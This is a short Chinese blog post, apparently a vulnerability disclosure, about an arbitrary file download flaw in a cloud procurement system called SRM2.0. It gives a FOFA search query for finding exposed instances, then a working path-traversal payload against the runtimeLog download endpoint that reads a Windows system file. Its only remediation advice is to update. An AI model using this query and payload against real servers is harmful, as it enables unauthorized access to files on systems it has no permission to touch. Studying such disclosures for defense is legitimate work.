某云彩SRM2.0任意文件下载漏洞

扣脚大汉在网络2024-09-06 16:01

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统download在接口处存在任意文件下载漏洞

漏洞复现

payload

复制代码 
http://ip/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=C:\Windows\System32\drivers\etc\hosts


修复建议

更新到最新版本

相关推荐
战神/calmness9 天前
CVE-2021-26295:Apache OFBiz 反序列化漏洞
网络安全·漏洞
久绊A1 个月前
WordPress Fontsy Plugin SQL注入漏洞深度剖析与防御指南
安全·漏洞
独角鲸网络安全实验室2 个月前
WhisperPair漏洞突袭:谷歌Fast Pair协议失守,数亿蓝牙设备陷静默劫持危机
网络安全·数据安全·漏洞·蓝牙耳机·智能设备·fast pair·cve-2025-36911
白帽子凯哥哥2 个月前
网络安全Web基础完全指南:从小白到入门安全测试
前端·sql·web安全·信息安全·渗透测试·漏洞
独角鲸网络安全实验室2 个月前
本地信任成“致命漏洞”:数千Clawdbot Agent公网裸奔,供应链与内网安全告急
网络·网关·安全·php·漏洞·clawdbot·信任机制漏洞
DarkAthena2 个月前
【GaussDB】合入原生PG的PR来修复CVE-2025-1094漏洞后产生的严重隐患
数据库·漏洞·gaussdb
\xin2 个月前
SQL 注入、文件上传绕过、MySQL UDF 提权、SUID 提权、Docker 逃逸,以及 APT 持久化技术渗透测试全流程第二次思路
sql·mysql·docker·容器·渗透测试·json·漏洞
IT 青年2 个月前
Apache Struts XWork 组件 XXE 漏洞(CVE-2025-68493)[已复现]
漏洞·struts2
Jerry_Gao9212 个月前
【成长笔记】【web安全】深入Web安全与PHP底层:四天实战课程笔记
笔记·安全·web安全·php·漏洞
独角鲸网络安全实验室2 个月前
CVE-2025-61882深度分析:Oracle Concurrent Processing BI Publisher集成远程接管漏洞的技术原理与防御策略
数据库·网络安全·oracle·漏洞·ebs·cve-2025-61882·xml 注入
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03Labelme从安装到标注:零基础完整指南04OpenClaw 使用和管理 MCP 完全指南05AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07UV安装并设置国内源08OpenClaw Control UI安全上下文访问配置09Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services10不需要账号、免登录使用ClaudeCode+国内模型